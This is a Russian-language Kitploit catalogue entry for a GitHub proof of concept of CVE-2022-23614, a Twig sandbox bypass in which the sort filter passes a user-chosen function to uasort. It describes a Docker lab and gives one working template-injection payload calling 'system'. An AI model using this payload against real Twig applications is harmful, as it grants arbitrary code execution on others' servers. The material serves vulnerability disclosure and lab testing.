Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-23614 — Эксплойт доказательства концепции для CVE-2022-23614, демонстрирующий произвольное выполнение кода через обход песочницы фильтра sort в Twig в PHP-приложениях. | Kitploit
Инструменты/GitHubGitHub/davwwwx/cve-2022-23614
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubdavwwwx/cve-2022-23614

CVE-2022-23614

Эксплойт доказательства концепции для CVE-2022-23614, демонстрирующий произвольное выполнение кода через обход песочницы фильтра sort в Twig в PHP-приложениях.

Репозиторий
424 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-23614

PoC для CVE-2022-23614, GHSA-5mv2-rx3q-4w2v (выполнение кода/обход песочницы через фильтр sort в Twig)

Как видно из этого коммита - https://github.com/twigphp/Twig/commit/.., Twig передавал имя функции, предоставленное пользователем, в качестве параметра обратного вызова в uasort (здесь), что приводило к произвольному выполнению кода

Чтобы собрать и запустить Docker-контейнер с уязвимой версией Twig:

root@kitploit:~
$ ./build-docker.sh

Откройте веб-страницу по адресу localhost:1337 и попробуйте отрендерить следующий пейлоад:

root@kitploit:~
{{ ['id','']|sort('system') }}

PoC PoC

Результат Result

Скачать инструмент